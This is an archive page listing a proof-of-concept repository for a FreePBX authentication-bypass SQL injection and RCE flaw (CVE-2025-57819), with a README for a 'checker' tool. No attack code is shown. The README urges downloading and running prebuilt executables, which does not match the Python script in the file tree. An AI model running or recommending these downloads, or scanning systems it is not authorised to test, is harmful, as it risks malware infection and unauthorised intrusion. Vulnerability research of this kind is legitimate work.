Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-57819 PoC β€” FreePBX Affected by Authentication Bypass Leading to SQL Injection and RCE

Source
https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC
Associated Vulnerability
Title:FreePBX Affected by Authentication Bypass Leading to SQL Injection and RCE (CVE-2025-57819)
Description:FreePBX is an open-source web-based graphical user interface. FreePBX 15, 16, and 17 endpoints are vulnerable due to insufficiently sanitized user-supplied data allowing unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution. This issue has been patched in endpoint versions 15.0.66, 16.0.89, and 17.0.3.
Description
πŸ” Detect SQL injection risks in FreePBX's admin interface safely and efficiently, providing actionable insights and clean JSON reports for security teams.
Readme
# πŸ› οΈ CVE-2025-57819_FreePBX-PoC - Simple SQL Injection Checker for Your Needs

## πŸ“₯ Download Now
[![Download](https://img.shields.io/badge/Download-v1.0-blue.svg)](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases)

## πŸš€ Getting Started
Welcome to the **CVE-2025-57819_FreePBX-PoC** project. This application allows you to safely check for SQL Injection vulnerabilities in FreePBX. It uses simple techniques to provide accurate results without harming your system.

### πŸ“‹ Features
- **Read-Only Operation:** No changes made to your system.
- **Multi-Method Detection:** Utilizes error, boolean, and time-based techniques.
- **Detailed Reporting:** JSON format for easy understanding.
- **Per-Parameter Verdicts:** Check each parameter individually for vulnerabilities.
- **User-Friendly Interface:** Designed for those with no programming background.

## πŸ–₯️ System Requirements
To run this application, you need:
- A computer with Windows, macOS, or Linux.
- At least 1 GB of RAM.
- A stable internet connection.

## πŸ“‚ Download & Install
To get started, follow these steps:

1. **Visit the Release Page:** Go to the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) on GitHub.
2. **Select Latest Version:** Look for the latest version available.
3. **Download the Application:**
   - Click the download link for your operating system. The application is often provided in formats like `.exe` for Windows, `.dmg` for macOS, and `.tgz` or `.zip` for Linux.
4. **Run the Application:** After downloading, open the file and follow the on-screen instructions to launch the checker.

## βš™οΈ How to Use the Application
1. **Start the Checker:** Open the application you downloaded.
2. **Enter Your Target:** Input the FreePBX URL or IP address you want to check.
3. **Choose Options:** Select from the available detection methods based on your need.
4. **Run the Check:** Press the start button to begin the check.
5. **View Results:** After completion, review the JSON report to understand the findings.

## πŸ“ Understanding the Report
The output is presented in a JSON format, which is structured for clarity. Each parameter checked will have its own section that details whether it is vulnerable or not.

Example section in the JSON report:
```json
{
  "parameter": "username",
  "vulnerable": false,
  "details": "No injectable parameters found."
}
```
This format makes it easy for anyone to read and interpret the results.

## πŸ› οΈ Troubleshooting Common Issues
- **Error Starting Application:** Ensure you have the necessary permissions to run the file.
- **Invalid URL Error:** Double-check the FreePBX address you entered. It should be reachable.
- **No Results Shown:** Review your network connection and confirm that the target FreePBX is running.

## 🌐 Get More Help
If you encounter challenges or have questions, check the project’s GitHub for additional information or ask in the issues section. The community can provide support and share tips.

## πŸ“£ Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page.

## πŸ”— Explore More
Discover related topics and tools in the security space:
- **Asterisk:** A powerful open-source framework for building communications applications.
- **SQL Injection Protection:** Learn about methods to prevent SQL Injection.
- **Penetration Testing:** Gain insights into testing for vulnerabilities in systems.

For more information, visit the [Releases page](https://github.com/JakovBis/CVE-2025-57819_FreePBX-PoC/releases) to stay updated on the latest features and updates.
File Snapshot

 [4.0K]  /data/pocs/1db26aef66bbfd57819aa97273255847c9a94a54
β”œβ”€β”€ [ 15K]  freepbx_sqli_checker.py
β”œβ”€β”€ [1.0K]  LICENSE
β”œβ”€β”€ [3.6K]  README.md
β”œβ”€β”€ [2.5K]  SECURITY.md
└── [4.0K]  unlatticed
    └── [1.3M]  CVE-2025-57819_FreePBX-PoC.zip

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’